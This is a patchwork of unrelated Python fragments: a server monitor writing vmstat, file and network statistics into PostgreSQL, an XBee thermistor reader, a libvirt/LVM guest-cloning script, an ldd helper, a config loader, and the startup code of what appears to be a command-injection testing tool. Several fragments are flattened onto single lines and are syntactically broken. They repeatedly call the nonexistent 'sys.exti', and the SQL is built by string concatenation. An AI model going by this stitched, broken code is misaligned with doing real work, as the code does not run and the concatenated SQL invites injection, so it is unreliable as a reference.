    # Run the sysmon001 stored procedure to capture a bunch of record
    # counts and save them to shardsvr.sysmon_rec_counts:
    cmd = 'SELECT shardsvr.sysmon001();'
    rc, my_data, msg = shardfuncs.shard_sql_select(cur, cmd)
    if rc != 0:
        out.update({'Error': 'SQL insert command failed.'})
        out.update({'Error-detail': msg['Error']})
        conn.close()
        print('ERROR111111: ' + repr(msg))
    else:
        rec_counts_write_count += 1
    print('rec_counts_write_count = ' + str(rec_counts_write_count))

    # -------------------------------------------------------------------------
    # vmstat - collect memory and CPU info
    rc, msg_d = vmstat()
    out.update(msg_d)
    rslts = None
    vmstat_write_count = 0
    try:
        # Get the dictionary object from the file monitor:
        rslts = msg_d['vmstat']
    except Exception:
        print('Error. I did not find vmstat output.')
    if rslts is not None:
        v = rslts
        # Note: two table fields have '-' replaced with '_':
        # non-nice_user_cpu_ticks and IO-wait_cpu_ticks
        cmd = 'INSERT INTO shardsvr.sysmon_vmstat (' \
            + 'K_total_memory, K_used_memory, K_active_memory, ' \
            + 'K_free_memory, K_swap_cache, ' \
            + 'K_total_swap, K_free_swap, ' \
            + 'non_nice_user_cpu_ticks, nice_user_cpu_ticks, ' \
            + 'system_cpu_ticks, idle_cpu_ticks, IO_wait_cpu_ticks, ' \
            + 'boot_time, sysmon_vmstat_dt) ' \
            + 'VALUES (' + str(v['K_total_memory']) + ', ' \
            + str(v['K_used_memory']) + ', ' \
            + str(v['K_active_memory']) + ', ' \
            + str(v['K_free_memory']) + ', ' \
            + str(v['K_swap_cache']) + ', ' \
            + str(v['K_total_swap']) + ', ' \
            + str(v['K_free_swap']) + ', ' \
            + str(v['non-nice_user_cpu_ticks']) + ', ' \
            + str(v['nice_user_cpu_ticks']) + ', ' \
            + str(v['system_cpu_ticks']) + ', ' \
            + str(v['idle_cpu_ticks']) + ', ' \
            + str(v['IO-wait_cpu_ticks']) + ', ' \
            + str(v['boot_time']) + ', ' + datestamp_sql + ');'
        rc, msg = shardfuncs.shard_sql_insert(cur, cmd)
        if rc != 0:
            out.update({'Error': 'SQL insert command failed.'})
            out.update({'Error-detail': msg['Error']})
            conn.close()
            print('ERROR999999: ' + repr(msg))
        else:
            vmstat_write_count += 1
        # the sql-write loop is done, now commit
        cur.execute('commit;')
        # do not conn.close() until the end (or on error)
        out.update({'status': "OK"})
    print('vmstat write count: ' + str(vmstat_write_count))

    # -------------------------------------------------------------------------
    # File Monitor (collect file attributes for specific files)
    if len(MON_FILE_LIST) > 0:
        for fname in MON_FILE_LIST:
            rc, msg_d = mon_file(fname)
            out.update(msg_d)
            rslts = None
            try:
                # Get the dictionary object from the file monitor:
                rslts = msg_d['mon_file']
            except Exception:
                print('I did not find results from the file_monitor.')
            file_write_count = 0
            if rslts is not None:
                for k, v in rslts.items():
                    # There could be many files here
                    fname = re.sub(r'[\'"\r\t\n]', '', k[0:200])
                    # These are file attributes:
                    # file_type, inode, change_time, access_time, mod_time.
                    cmd = 'INSERT INTO shardsvr.sysmon_file(' \
                        'file_name, file_type, ' \
                        'inode, chg_time, access_time, ' \
                        'mod_time, sysmon_file_dt ) ' \
                        'VALUES(' + "'" + fname + "', " \
                        + str(v['file_type']) + ', ' \
                        + str(v['inode']) + ', ' \
                        + str(v['change_time']) + ', ' \
                        + str(v['access_time']) + ', ' \
                        + str(v['mod_time']) + ', ' \
                        + datestamp_sql + ');'
                    rc, msg = shardfuncs.shard_sql_insert(cur, cmd)
                    if rc != 0:
                        out.update({'Error': 'SQL insert command failed.'})
                        out.update({'Error-detail': msg['Error']})
                        conn.close()
                        print('ERROR33333: ' + repr(msg))
                    else:
                        file_write_count += 1
                # the sql-write loop is done, now commit
                cur.execute('commit;')
                # do not conn.close() until the end (or on error)
                out.update({'status': "OK"})
                print('file write count: ' + str(file_write_count))

    # -------------------------------------------------------------------------
    # nstat - Network IO stats
    rc, msg_d = nstat()
    out.update(msg_d)
    rslts = None  # BUG FIX: avoid NameError when the key is missing
    try:
        # Get the dictionary object from the file monitor:
        rslts = msg_d['nstat']
    except Exception:
        print('I did not find the nstat dictionary key.')
    if rslts is not None:
        v = rslts
        nstat_write_count = 0
        cmd = 'INSERT INTO shardsvr.sysmon_nstat(' + \
            'IpExtInOctets, IpExtOutOctets, ' + \
            'IpInReceives, TcpActiveOpens, TcpPassiveOpens, ' + \
            'IpOutRequests, sysmon_nstat_dt) ' + \
            'VALUES( ' \
            + str(v['IpExtInOctets']) + ', ' \
            + str(v['IpExtOutOctets']) + ', ' \
            + str(v['IpInReceives']) + ', ' + str(v['TcpActiveOpens']) + ', ' \
            + str(v['TcpPassiveOpens']) + ', ' \
            + str(v['IpOutRequests']) + ', ' \
            + datestamp_sql + ');'
        rc, msg = shardfuncs.shard_sql_insert(cur, cmd)
        if rc != 0:
            out.update({'Error': 'SQL insert command failed.'})
            out.update({'Error-detail': msg['Error']})
            conn.close()
            print('ERROR8888: ' + repr(msg))
        else:
            nstat_write_count += 1
        # the sql-write loop is done, now commit
        cur.execute('commit;')
        # do not conn.close() until the end (or on error)
        out.update({'status': "OK"})
        print('nstat write count: ' + str(nstat_write_count))
def main():
    """Discover the XBee nodes listed in ``REMOTE_NODES_ID``, then spawn one
    worker thread per discovered node that periodically reads its analog
    inputs (NTC thermistor temperatures) and forwards them to Telegraf.

    Exits with status -1 when no node could be discovered, and with
    status 1 on an unexpected error while the workers run.
    """

    class ReadAD:
        """Serializes access to the local XBee radio across worker threads."""

        def __init__(self, start=0):
            self.lock = threading.Lock()
            self.value = start

        def read_AD(self, indice):
            """Read VCC and the four ADC lines of node *indice*, convert the
            raw readings to temperatures and push them to Telegraf.

            Returns:
                bool: True when the remote node timed out, False otherwise.
            """
            logging.debug('Waiting for lock')
            self.lock.acquire()
            try:
                self.timeout = False
                logging.debug('Acquired lock')
                # Supply voltage ("%V" parameter) is needed to scale the
                # raw ADC counts; it arrives as hex bytes.
                vcc = nodos_activos[indice].get_parameter("%V")
                vcc = int(utils.hex_to_string(vcc).replace(' ', ''), 16)
                # Read the raw value of each analog input line.
                raw_value_1 = nodos_activos[indice].get_adc_value(IOLINE_IN_0)
                raw_value_2 = nodos_activos[indice].get_adc_value(IOLINE_IN_1)
                raw_value_3 = nodos_activos[indice].get_adc_value(IOLINE_IN_2)
                raw_value_4 = nodos_activos[indice].get_adc_value(IOLINE_IN_3)
                # Convert each raw reading to a temperature, as a function
                # of the supply voltage.
                tntc_1 = ntc10k_calculate_temp(raw_value_1, vcc)
                tntc_2 = ntc10k_calculate_temp(raw_value_2, vcc)
                tntc_3 = ntc10k_calculate_temp(raw_value_3, vcc)
                tntc_4 = ntc10k_calculate_temp(raw_value_4, vcc)
                # Forward the four temperatures plus VCC to Telegraf.
                send_data_to_telegraf.main(REMOTE_NODES_ID[indice],
                                           tntc_1, tntc_2, tntc_3, tntc_4,
                                           float(vcc))
            except TimeoutException:
                # Remote node did not answer; reset the local radio so the
                # next request starts from a clean state.
                self.timeout = True
                logging.debug('ADC error')
                local_device.reset()
            finally:
                self.lock.release()
            return self.timeout

    # One timeout counter per worker thread, indexed by node position.
    timeouts = []

    def worker(c, i):
        """Poll node *i* forever with a variable period.

        On a timeout the poll rate speeds up (SHORT_WAIT) to catch a node
        that may be in a sleep cycle; after MAX_INTENTOS_LEER_DATOS
        consecutive timeouts the node is not polled any more.
        """
        timeouts.append(0)
        try:
            while timeouts[i] < MAX_INTENTOS_LEER_DATOS:
                logging.debug('Stamp: %s', str(datetime.now()))
                logging.debug("TIMEOUTS %s", timeouts)
                if c.read_AD(i):
                    timeouts[i] += 1
                    logging.debug("Timeouts %s", timeouts)
                    pause = SHORT_WAIT
                else:
                    # NOTE: the timeout counter is deliberately not reset on
                    # a successful read (the reset line was commented out).
                    pause = LONG_WAIT
                logging.debug('Sleeping %0.02f', pause)
                time.sleep(pause)
        except ValueError:
            logging.debug('Worker error')

    # Remote devices successfully discovered on the XBee network.
    nodos_activos = []

    def descubre_nodos():
        """Discover every node in REMOTE_NODES_ID, retrying each one up to
        MAX_INTENTOS_DESCUBRIMIENTO times before giving up on it."""
        index_devices = 0
        try:
            for index in range(0, len(REMOTE_NODES_ID)):
                nodo_descubierto = False
                intentos_descubir = 0
                while (not nodo_descubierto
                        and intentos_descubir < MAX_INTENTOS_DESCUBRIMIENTO):
                    remote_device = (xbee_network.discover_device(
                        REMOTE_NODES_ID[index]))
                    if remote_device is None:
                        logging.debug('Could not find the remote device: %s',
                                      REMOTE_NODES_ID[index])
                        intentos_descubir += 1
                        logging.debug("Nodo: %s", (REMOTE_NODES_ID[index]))
                        logging.debug(
                            'Intentos descubrimiento restantes: %s',
                            (MAX_INTENTOS_DESCUBRIMIENTO - intentos_descubir))
                        time.sleep(1)
                    else:
                        nodos_activos.append(remote_device)
                        index_devices += 1
                        logging.debug('Descubierto: %s', remote_device)
                        nodo_descubierto = True
        except Exception:
            # Best-effort: discovery problems are logged, not fatal.
            logging.debug('Error proceso descubrimiento')

    # Log output configuration.
    logging.basicConfig(
        level=logging.DEBUG,
        format='(%(threadName)-10s) %(message)s',
    )

    # Connect to the local node.
    local_device = XBeeDevice(port, baud_rate)
    xbee_network = local_device.get_network()
    local_device.open()
    local_device.set_sync_ops_timeout(40)
    descubre_nodos()

    try:
        lectura = ReadAD()
        # One thread per discovered node.
        for i in range(len(nodos_activos)):
            logging.debug('creando hilo')
            t = threading.Thread(name=nodos_activos[i],
                                 target=worker,
                                 args=(
                                     lectura,
                                     i,
                                 ))
            t.start()
        if len(nodos_activos) == 0:
            logging.debug('No nodes found')
            # BUG FIX: was sys.exti(-1), which raised AttributeError.
            sys.exit(-1)
        else:
            logging.debug('Waiting for worker threads')
            main_thread = threading.main_thread()
            for t in threading.enumerate():
                if t is not main_thread:
                    t.join()
        logging.debug('Counter: %d', lectura.value)
    except Exception:
        # Must not be a bare `except:`: sys.exit() raises SystemExit, which a
        # bare clause would swallow and turn into exit status 1.
        logging.debug('exept')
        sys.exit(1)
except SocketError and err_msg: if settings.VERBOSITY_LEVEL >= 1: print ("") err_msg = "The target host is not responding." err_msg += " Please ensure that is up and try again." print(("\n" + settings.print_critical_msg(err_msg) )) logs.print_logs_notification(filename, url) try: # Check python version number. version.python_version() # Check if defined "--version" option. if menu.options.version: version.show_version() raise sys.exti() # Print the legal disclaimer msg. print((settings.print_legal_disclaimer_msg(settings.LEGAL_DISCLAIMER_MSG))) if not menu.options.batch: settings.OS_CHECKS_NUM = 1 for os_checks_num in range(0, int(settings.OS_CHECKS_NUM)): # Check if defined "--list-tampers" option. if menu.options.list_tampers: checks.list_tamper_scripts() raise SystemExit() if readline_error : checks.no_readline_module()
def main():
    """Clone a libvirt guest onto a freshly created LVM Logical Volume.

    Reads the hypervisor and guest sections from the config file, creates
    the destination LV (sized either from --lv-size or from the source
    disk), runs virt-clone (and virt-resize when the sizes differ), then
    optionally runs sysprep on the new guest.

    Exits non-zero on error: 1 for configuration/runtime errors and the
    subprocess return code for failed external commands.
    """
    parent_parser = libargparse.parse_argv()
    parent_parser.set_defaults(config_file=default_configfile())
    args = parse_argv(parent_parser)
    (config_file, guest_name, log_level,
     sudo, dst_lv_size, os_variant) = (args.config_file, args.guest_name,
                                       args.log_level, args.sudo,
                                       args.lv_size, args.os_variant)
    scriptname = os.path.basename(__file__)

    # objects
    log_fmt = '%(asctime)s [%(levelname)s] %(name)s: %(message)s'
    log = liblogging.setup_logging(name=scriptname, filename='-',
                                   log_level=log_level, fmt=log_fmt)
    clone = libvirtclone.VirtClone(sudo=sudo)

    try:
        configparser = libconfigparser3.Parser(config_file)
        hv = configparser.get_nmdict('hypervisor')
        guest = configparser.get_nmdict(os_variant)

        src_guest_name = guest['name']
        src_guest_disk_path = guest['disk_path']
        # Lazily computed below only when actually needed.
        src_guest_disk_size = None
        src_guest_disk_type = guest['disk_type']
        src_guest_partition = guest['partition']
        src_guest_lgvol = guest['lg_vol']
        sysprep_execute = guest['sysprep_execute']
        sysprep_enable = guest['sysprep_enable']
        sysprep_script = guest.get('sysprep_script', None)
        dst_lv_name = clone.guest_disk_name(guest_name)
        dst_vg_name = hv['vg_name']

        # The source guest must be shut off before cloning.
        if clone.guest_is_alive(src_guest_name) is True:
            log.error('{} {}'.format(src_guest_name, 'must be shut off!'))
            sys.exit(1)

        # Pick the size-probing helper matching the source disk type.
        if src_guest_disk_type == 'lvm':
            get_size = clone.lv_size
        elif src_guest_disk_type == 'qemu':
            get_size = clone.qemu_disk_size
        else:
            log.error('disk_type must to be `lvm` or `qemu`')
            sys.exit(1)

        # Size of the destination Logical Volume: explicit --lv-size wins,
        # otherwise mirror the source disk size.
        if dst_lv_size is not None:
            dst_guest_disk_size = dst_lv_size
        else:
            src_guest_disk_size = get_size(src_guest_disk_path)
            dst_guest_disk_size = src_guest_disk_size

        # Create the destination Logical Volume.
        lv_create_stdout = clone.lv_create(dst_guest_disk_size,
                                           dst_vg_name, dst_lv_name)
        log.info(lv_create_stdout.strip())

        # Full path of the destination Logical Volume.
        dst_guest_disk = os.path.join('/dev', dst_vg_name, dst_lv_name)

        # Actual source/destination disk sizes (e.g. '20G'); sizes are
        # strings with a trailing unit letter, stripped before comparing.
        if src_guest_disk_size is None:
            src_guest_disk_size = get_size(src_guest_disk_path)
        dst_guest_disk_size = get_size(dst_guest_disk)

        resize_method = clone.virt_resize_method(
            int(src_guest_disk_size[:-1]), int(dst_guest_disk_size[:-1]))
        # When a resize is needed, virt-clone only writes the XML and
        # virt-resize copies/adjusts the data afterwards.
        write_xml_only = resize_method is not None

        log.info('disk clone, please wait...')
        write_xml_only_str = '{}={}'.format('write_xml_only', write_xml_only)
        log.debug(_join(['virt-clone', src_guest_name, guest_name,
                         dst_guest_disk, write_xml_only_str]))
        virt_clone_stdout = clone.virt_clone(src_guest_name, guest_name,
                                             dst_guest_disk, write_xml_only)
        log.debug(virt_clone_stdout)

        if write_xml_only is True or resize_method is not None:
            log.debug(_join(['virt-resize', src_guest_disk_path,
                             dst_guest_disk, resize_method,
                             src_guest_partition, src_guest_lgvol,
                             'lv_expand=False']))
            resize_stdout = clone.virt_resize(src_guest_disk_path,
                                              dst_guest_disk,
                                              resize_method,
                                              src_guest_partition,
                                              src_guest_lgvol,
                                              lv_expand=False,)
            log.debug(resize_stdout.rstrip())
        log.info('disk clone successfully')

        if sysprep_execute == 'True':
            log.info('starting sysprep')
            sysprep_out = clone.sysprep(sysprep_enable, guest_name,
                                        sysprep_script)
            log.debug(sysprep_out)
            log.info('sysprep successfully')
        log.info('clone successfully')
    except subprocess.CalledProcessError as e:
        log.error(fmt_called_processor_error(e))
        sys.exit(e.returncode)
    except KeyboardInterrupt:
        # BUG FIX: was sys.exti(1) — AttributeError masked the clean exit.
        sys.exit(1)
    except Exception as e:
        los = traceback.format_exception_only(type(e), e)
        log.error(_join(los))
        sys.exit(1)
#use like: python + script_name + libname # coding = utf-8 import sys, os try: str_obrel = os.environ["OB_REL"] lib_name = sys.argv[1] str_order = "ldd " + lib_name res_obrel = "" try: f = os.popen(str_order) except: print("you need checke the order" + str_order + " whether it can do well in the linux") sys.exti(1) lines = f.readlines() temp = "" for line in lines: if str_obrel not in line: continue l_index = line.find('>') r_index = line.find('(') if l_index == -1 or r_index == -1: continue l_index = l_index + 1 line = line[l_index:r_index].strip() # print ('line:'+ line) if os.path.islink(line): temp = os.readlink(line) else: temp = line
if __name__ == '__main__': CONFIG_FNAME = '/var/natmsg/conf/housekeeping_shardsvr.conf' MAIN_CONFIG = configparser.ConfigParser() MAIN_CONFIG.read(CONFIG_FNAME) DBNAME = MAIN_CONFIG['global']['DBNAME'] HOSTNAME = MAIN_CONFIG['global']['HOSTNAME'] DB_UNAME = MAIN_CONFIG['global']['DB_UNAME'] DB_PW = MAIN_CONFIG['global']['DB_PW'] if DBNAME == '' or DB_UNAME == '' or DB_PW == '' or HOSTNAME == '': print('Error, database connection details are missing.') sys.exti(15) ############################################################################## datestamp = datetime.datetime.now() datestamp_sql = "'" + str(datestamp.year) + "-" \ + str(datestamp.month).zfill(2) \ + "-" + str(datestamp.day).zfill(2) + ' ' \ + str(datestamp.hour).zfill(2) \ + ':' + str(datestamp.minute).zfill(2) + ':' \ + str(datestamp.second).zfill(2) + "'::timestamp " ## print('datestamp: ' + datestamp_sql) ############################################################ # register the ssl keys and a few shards that # I create that should never be read out = {}